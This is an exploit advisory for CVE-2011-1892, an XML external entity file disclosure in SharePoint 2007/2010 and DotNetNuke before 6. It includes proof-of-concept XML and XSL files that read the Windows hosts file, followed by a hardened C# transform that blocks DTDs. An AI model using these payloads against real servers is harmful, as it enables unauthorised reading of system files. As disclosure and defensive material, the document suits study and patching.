# Title : File disclosure via XEE in SharePoint 2007/2010 and DotNetNuke < 6
# Published : 2011-09-20
Exploit Title: File disclosure via XEE in SharePoint and DotNetNuke
Date: September 15, 2011
Author: Nicolas Gregoire
Version: SharePoint 2007 / 2010, DotNetNuke < 6
CVE : CVE-2011-1892
poc filename: xee.xml
<!DOCTYPE doc [
<!ENTITY boom SYSTEM "c:\windows\system32\drivers\etc\hosts">
]>
<doc>&boom;</doc>
poc filename: xee.xsl
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:template match="/">
    <xsl:apply-templates/>
    <xsl:value-of select="doc"/>
  </xsl:template>
</xsl:stylesheet>
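
Defensive counterpart to the two PoC files above, as an added example (not part of the original advisory, and not SharePoint or DotNetNuke code): a .NET XSLT transform that refuses any DOCTYPE and resolves no external resources. The class and method names are hypothetical; the embedded documents are xee.xml and xee.xsl from this page.

```csharp
using System;
using System.IO;
using System.Xml;
using System.Xml.Xsl;

// Hypothetical class; added example, not SharePoint or DotNetNuke code.
static class HardenedTransform
{
    // xee.xml and xee.xsl from this page, re-quoted with ' for the C# literals.
    const string Xml = @"<!DOCTYPE doc [
<!ENTITY boom SYSTEM 'c:\windows\system32\drivers\etc\hosts'>
]>
<doc>&boom;</doc>";
    const string Xsl = @"<xsl:stylesheet version='1.0' xmlns:xsl='http://www.w3.org/1999/XSL/Transform'>
<xsl:template match='/'><xsl:apply-templates/><xsl:value-of select='doc'/></xsl:template>
</xsl:stylesheet>";

    // Reader that throws XmlException on any DOCTYPE and has no resolver,
    // so no external entity is ever fetched.
    // On .NET 2.0/3.5 the equivalent setting is ProhibitDtd = true.
    static XmlReader SafeReader(string text)
    {
        var settings = new XmlReaderSettings
        {
            DtdProcessing = DtdProcessing.Prohibit,
            XmlResolver = null
        };
        return XmlReader.Create(new StringReader(text), settings);
    }

    public static string Transform(string xml, string xsl)
    {
        var xslt = new XslCompiledTransform();
        // XsltSettings.Default keeps document() and embedded script disabled;
        // the null resolver blocks xsl:import / xsl:include of external files.
        using (var xslReader = SafeReader(xsl))
            xslt.Load(xslReader, XsltSettings.Default, null);
        using (var xmlReader = SafeReader(xml))
        using (var output = new StringWriter())
        {
            xslt.Transform(xmlReader, null, output);
            return output.ToString();
        }
    }

    static void Main()
    {
        try { Console.WriteLine(Transform(Xml, Xsl)); }
        catch (Exception e) when (e is XmlException || e is XsltException)
        { Console.WriteLine("Rejected: " + e.Message); }
    }
}
```

With xee.xml as input the transform stops at the DOCTYPE declaration, before the boom entity is read, and the hosts file content never reaches the output.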